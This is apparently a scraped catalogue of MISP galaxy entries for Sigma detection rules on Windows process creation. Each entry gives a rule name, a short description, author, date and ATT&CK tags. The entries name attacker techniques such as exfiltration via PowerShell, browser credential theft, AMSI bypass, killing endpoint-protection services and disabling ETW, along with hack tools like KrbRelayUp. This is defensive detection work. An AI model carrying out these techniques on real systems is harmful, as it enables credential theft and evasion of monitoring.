filename proc_creation_win_susp_script_exec_from_env_folder.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Insecure Transfer Via Curl.EXE

Detects execution of "curl.exe" with the "--insecure" flag.

Internal MISP references

UUID cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec which can be used as unique global reference for Insecure Transfer Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/30
falsepositive ['Access to badly maintained internal or development systems']
filename proc_creation_win_curl_insecure_connection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Remote Code Execute via Winrm.vbs

Detects an attempt to execute code or create service on remote host via winrm.vbs.

Internal MISP references

UUID 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 which can be used as unique global reference for Remote Code Execute via Winrm.vbs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/07
falsepositive ['Unknown']
filename proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Email Exifiltration Via Powershell

Detects email exfiltration via powershell cmdlets

Internal MISP references

UUID 312d0384-401c-4b8b-abdf-685ffba9a332 which can be used as unique global reference for Email Exifiltration Via Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)
creation_date 2022/09/09
falsepositive ['Unknown']
filename proc_creation_win_powershell_email_exfil.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration']

Potential PowerShell Obfuscation Via Reversed Commands

Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers

Internal MISP references

UUID b6b49cd1-34d6-4ead-b1bf-176e9edba9a4 which can be used as unique global reference for Potential PowerShell Obfuscation Via Reversed Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
creation_date 2020/10/11
falsepositive ['Unlikely']
filename proc_creation_win_powershell_cmdline_reversed_strings.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Manipulation Of Default Accounts Via Net.EXE

Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc

Internal MISP references

UUID 5b768e71-86f2-4879-b448-81061cbae951 which can be used as unique global reference for Suspicious Manipulation Of Default Accounts Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium']
filename proc_creation_win_net_user_default_accounts_manipulation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Process Creation Using Sysnative Folder

Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)

Internal MISP references

UUID 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab which can be used as unique global reference for Process Creation Using Sysnative Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/08/23
falsepositive ['Unknown']
filename proc_creation_win_susp_sysnative.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via MSEDGE_PROXY.EXE

Detects usage of "msedge_proxy.exe" to download arbitrary files

Internal MISP references

UUID e84d89c4-f544-41ca-a6af-4b92fd38b023 which can be used as unique global reference for Arbitrary File Download Via MSEDGE_PROXY.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/11/09
falsepositive ['Unknown']
filename proc_creation_win_msedge_proxy_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - Crassus Execution

Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.

Internal MISP references

UUID 2c32b543-1058-4808-91c6-5b31b8bed6c5 which can be used as unique global reference for PUA - Crassus Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unlikely']
filename proc_creation_win_pua_crassus.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1590.001']
Related clusters

To see the related clusters, click here.

Add New Download Source To Winget

Detects usage of winget to add new additional download sources

Internal MISP references

UUID 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 which can be used as unique global reference for Add New Download Source To Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ['False positive are expected with legitimate sources']
filename proc_creation_win_winget_add_custom_source.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS

Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine

Internal MISP references

UUID 07aa184a-870d-413d-893a-157f317f6f58 which can be used as unique global reference for Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Unknown']
filename proc_creation_win_susp_gather_network_info_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1615', 'attack.t1059.005']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Parent Process

Detects a suspicious or uncommon parent processes of PowerShell

Internal MISP references

UUID 754ed792-634f-40ae-b3bc-e0448d33f695 which can be used as unique global reference for Suspicious PowerShell Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Harish Segar
creation_date 2020/03/20
falsepositive ['Other scripts']
filename proc_creation_win_powershell_susp_parent_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - SecurityXploded Execution

Detects the execution of SecurityXploded Tools

Internal MISP references

UUID 7679d464-4f74-45e2-9e01-ac66c5eb041a which can be used as unique global reference for HackTool - SecurityXploded Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/12/19
falsepositive ['Unlikely']
filename proc_creation_win_hktl_secutyxploded.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555']
Related clusters

To see the related clusters, click here.

RDP Connection Allowed Via Netsh.EXE

Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware

Internal MISP references

UUID 01aeb693-138d-49d2-9403-c4f52d7d3d62 which can be used as unique global reference for RDP Connection Allowed Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sander Wiebing
creation_date 2020/05/23
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_fw_allow_rdp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

HackTool - SysmonEOP Execution

Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120

Internal MISP references

UUID 8a7e90c5-fe6e-45dc-889e-057fe4378bd9 which can be used as unique global reference for HackTool - SysmonEOP Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/12/04
falsepositive ['Unlikely']
filename proc_creation_win_hktl_sysmoneop.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['cve.2022.41120', 'attack.t1068', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

HackTool - SharpLdapWhoami Execution

Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller

Internal MISP references

UUID d9367cbb-c2e0-47ce-bdc0-128cb6da898d which can be used as unique global reference for HackTool - SharpLdapWhoami Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/29
falsepositive ['Programs that use the same command line flags']
filename proc_creation_win_hktl_sharpldapwhoami.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Mailbox Export to Share

Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations

Internal MISP references

UUID 889719ef-dd62-43df-86c3-768fb08dc7c0 which can be used as unique global reference for Suspicious PowerShell Mailbox Export to Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/07
falsepositive ['Unknown']
filename proc_creation_win_powershell_mailboxexport_share.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration']

Imports Registry Key From a File

Detects the import of the specified file to the registry with regedit.exe.

Internal MISP references

UUID 73bba97f-a82d-42ce-b315-9182e76c57b1 which can be used as unique global reference for Imports Registry Key From a File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/07
falsepositive ['Legitimate import of keys', 'Evernote']
filename proc_creation_win_regedit_import_keys.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Potential AMSI Bypass Using NULL Bits

Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities

Internal MISP references

UUID 92a974db-ab84-457f-9ec0-55db83d7a825 which can be used as unique global reference for Potential AMSI Bypass Using NULL Bits in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/04
falsepositive ['Unknown']
filename proc_creation_win_powershell_amsi_null_bits_bypass.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Creation Involving Temp Folder

Detects the creation of scheduled tasks that involves a temporary folder and runs only once

Internal MISP references

UUID 39019a4e-317f-4ce3-ae63-309a8c6b53c5 which can be used as unique global reference for Suspicious Scheduled Task Creation Involving Temp Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/11
falsepositive ['Administrative activity', 'Software installation']
filename proc_creation_win_schtasks_creation_temp_folder.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

VeeamBackup Database Credentials Dump Via Sqlcmd.EXE

Detects dump of credentials in VeeamBackup dbo

Internal MISP references

UUID b57ba453-b384-4ab9-9f40-1038086b4e53 which can be used as unique global reference for VeeamBackup Database Credentials Dump Via Sqlcmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_sqlcmd_veeam_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

PUA - Process Hacker Execution

Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.

Internal MISP references

UUID 811e0002-b13b-4a15-9d00-a613fce66e42 which can be used as unique global reference for PUA - Process Hacker Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/10
falsepositive ["While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis"]
filename proc_creation_win_pua_process_hacker.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.discovery', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1622', 'attack.t1564', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Rundll32 Registered COM Objects

load malicious registered COM objects

Internal MISP references

UUID f1edd233-30b5-4823-9e6a-c4171b24d316 which can be used as unique global reference for Rundll32 Registered COM Objects in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename proc_creation_win_rundll32_registered_com_objects.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Writing Of Malicious Files To The Fonts Folder

Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.

Internal MISP references

UUID ae9b0bd7-8888-4606-b444-0ed7410cb728 which can be used as unique global reference for Writing Of Malicious Files To The Fonts Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/04/21
falsepositive ['Unknown']
filename proc_creation_win_susp_hiding_malware_in_fonts_folder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1211', 'attack.t1059', 'attack.defense_evasion', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Potential Browser Data Stealing

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

Internal MISP references

UUID 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b which can be used as unique global reference for Potential Browser Data Stealing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ['Unknown']
filename proc_creation_win_susp_copy_browser_data.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

Renamed NetSupport RAT Execution

Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings

Internal MISP references

UUID 0afbd410-de03-4078-8491-f132303cb67d which can be used as unique global reference for Renamed NetSupport RAT Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/19
falsepositive ['Unknown']
filename proc_creation_win_renamed_netsupport_rat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential MsiExec Masquerading

Detects the execution of msiexec.exe from an uncommon directory

Internal MISP references

UUID e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144 which can be used as unique global reference for Potential MsiExec Masquerading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/11/14
falsepositive ['Unknown']
filename proc_creation_win_msiexec_masquerading.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Suspicious Outlook Child Process

Detects a suspicious process spawning from an Outlook process.

Internal MISP references

UUID 208748f7-881d-47ac-a29c-07ea84bf691d which can be used as unique global reference for Suspicious Outlook Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
creation_date 2022/02/28
falsepositive ['Unknown']
filename proc_creation_win_office_outlook_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Copy From VolumeShadowCopy Via Cmd.EXE

Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)

Internal MISP references

UUID c73124a7-3e89-44a3-bdc1-25fe4df754b1 which can be used as unique global reference for Copy From VolumeShadowCopy Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Backup scenarios using the commandline']
filename proc_creation_win_cmd_shadowcopy_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp

Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.

Internal MISP references

UUID 551d9c1f-816c-445b-a7a6-7a3864720d60 which can be used as unique global reference for Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Stratton
creation_date 2023/11/13
falsepositive ['Unknown']
filename proc_creation_win_office_excel_dcom_lateral_movement.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1021.003', 'attack.lateral_movement']
Related clusters

To see the related clusters, click here.

Suspicious Msiexec Execute Arbitrary DLL

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Internal MISP references

UUID 6f4191bb-912b-48a8-9ce7-682769541e6d which can be used as unique global reference for Suspicious Msiexec Execute Arbitrary DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Legitimate script']
filename proc_creation_win_msiexec_execute_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

Potential MSTSC Shadowing Activity

Detects RDP session hijacking by using MSTSC shadowing

Internal MISP references

UUID 6ba5a05f-b095-4f0a-8654-b825f4f16334 which can be used as unique global reference for Potential MSTSC Shadowing Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/01/24
falsepositive ['Unknown']
filename proc_creation_win_mstsc_rdp_hijack_shadowing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1563.002']
Related clusters

To see the related clusters, click here.

Wusa.EXE Executed By Parent Process Located In Suspicious Location

Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.

Internal MISP references

UUID ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99 which can be used as unique global reference for Wusa.EXE Executed By Parent Process Located In Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/11/26
falsepositive ['Unknown']
filename proc_creation_win_wusa_susp_parent_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Schtasks Schedule Type With High Privileges

Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type

Internal MISP references

UUID 7a02e22e-b885-4404-b38b-1ddc7e65258a which can be used as unique global reference for Suspicious Schtasks Schedule Type With High Privileges in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/31
falsepositive ['Some installers were seen using this method of creation unfortunately. Filter them in your environment']
filename proc_creation_win_schtasks_schedule_type_system.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Taskkill Symantec Endpoint Protection

Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.

Internal MISP references

UUID 4a6713f6-3331-11ed-a261-0242ac120002 which can be used as unique global reference for Taskkill Symantec Endpoint Protection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilya Krestinichev, Florian Roth (Nextron Systems)
creation_date 2022/09/13
falsepositive ['Unknown']
filename proc_creation_win_taskkill_sep.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential PowerShell Obfuscation Via WCHAR

Detects suspicious encoded character syntax often used for defense evasion

Internal MISP references

UUID e312efd0-35a1-407f-8439-b8d434b438a6 which can be used as unique global reference for Potential PowerShell Obfuscation Via WCHAR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/09
falsepositive ['Unknown']
filename proc_creation_win_powershell_obfuscation_via_utf8.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use MSHTA

Detects Obfuscated Powershell via use MSHTA in Scripts

Internal MISP references

UUID ac20ae82-8758-4f38-958e-b44a3140ca88 which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/08
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious NTLM Authentication on the Printer Spooler Service

Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service

Internal MISP references

UUID bb76d96b-821c-47cf-944b-7ce377864492 which can be used as unique global reference for Suspicious NTLM Authentication on the Printer Spooler Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Elastic (idea), Tobias Michalski (Nextron Systems)
creation_date 2022/05/04
falsepositive ['Unknown']
filename proc_creation_win_rundll32_ntlmrelay.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access', 'attack.t1212']
Related clusters

To see the related clusters, click here.

Suspicious File Download From File Sharing Domain Via Curl.EXE

Detects potentially suspicious file download from file sharing domains using curl.exe

Internal MISP references

UUID 56454143-524f-49fb-b1c6-3fb8b1ad41fb which can be used as unique global reference for Suspicious File Download From File Sharing Domain Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unknown']
filename proc_creation_win_curl_download_susp_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Process By Web Server Process

Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation

Internal MISP references

UUID 8202070f-edeb-4d31-a010-a26c72ac5600 which can be used as unique global reference for Suspicious Process By Web Server Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Particular web applications may spawn a shell process legitimately']
filename proc_creation_win_webshell_susp_process_spawned_from_webserver.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.t1190']
Related clusters

To see the related clusters, click here.

MSExchange Transport Agent Installation

Detects the Installation of a Exchange Transport Agent

Internal MISP references

UUID 83809e84-4475-4b69-bc3e-4aad8568612f which can be used as unique global reference for MSExchange Transport Agent Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/08
falsepositive ['Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.']
filename proc_creation_win_powershell_msexchange_transport_agent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.002']
Related clusters

To see the related clusters, click here.

Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

Internal MISP references

UUID 7d1aaf3d-4304-425c-b7c3-162055e0b3ab which can be used as unique global reference for Potential Data Exfiltration Activity Via CommandLine Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/02
falsepositive ['Unlikely']
filename proc_creation_win_susp_data_exfiltration_via_cli.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - KrbRelayUp Execution

Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced

Internal MISP references

UUID 12827a56-61a4-476a-a9cb-f3068f191073 which can be used as unique global reference for HackTool - KrbRelayUp Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/26
falsepositive ['Unlikely']
filename proc_creation_win_hktl_krbrelayup.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003', 'attack.lateral_movement', 'attack.t1550.003']
Related clusters

To see the related clusters, click here.

Rundll32 Execution Without CommandLine Parameters

Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity

Internal MISP references

UUID 1775e15e-b61b-4d14-a1a3-80981298085a which can be used as unique global reference for Rundll32 Execution Without CommandLine Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/27
falsepositive ['Possible but rare']
filename proc_creation_win_rundll32_no_params.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential Binary Impersonating Sysinternals Tools

Detects binaries that use the same name as legitimate sysinternals tools to evade detection

Internal MISP references

UUID 7cce6fc8-a07f-4d84-a53e-96e1879843c9 which can be used as unique global reference for Potential Binary Impersonating Sysinternals Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_tools_masquerading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

LOLBAS Data Exfiltration by DataSvcUtil.exe

Detects when a user performs data exfiltration by using DataSvcUtil.exe

Internal MISP references

UUID e290b10b-1023-4452-a4a9-eb31a9013b3a which can be used as unique global reference for LOLBAS Data Exfiltration by DataSvcUtil.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger
creation_date 2021/09/30
falsepositive ['DataSvcUtil.exe being used may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567']
Related clusters

To see the related clusters, click here.

Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values

Internal MISP references

UUID 0d5675be-bc88-4172-86d3-1e96a4476536 which can be used as unique global reference for Potential Tampering With RDP Related Registry Keys Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
creation_date 2022/02/12
falsepositive ['Unknown']
filename proc_creation_win_reg_rdp_keys_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.lateral_movement', 'attack.t1021.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Windows Service Tampering

Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts

Internal MISP references

UUID ce72ef99-22f1-43d4-8695-419dcb5d9330 which can be used as unique global reference for Suspicious Windows Service Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022/09/01
falsepositive ['Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry']
filename proc_creation_win_susp_service_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Disable of ETW Trace

Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.

Internal MISP references

UUID a238b5d0-ce2d-4414-a676-7a531b3d13d6 which can be used as unique global reference for Disable of ETW Trace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2019/03/22
falsepositive ['Unknown']
filename proc_creation_win_susp_etw_trace_evasion.yml
level high
logsource.category process_creation
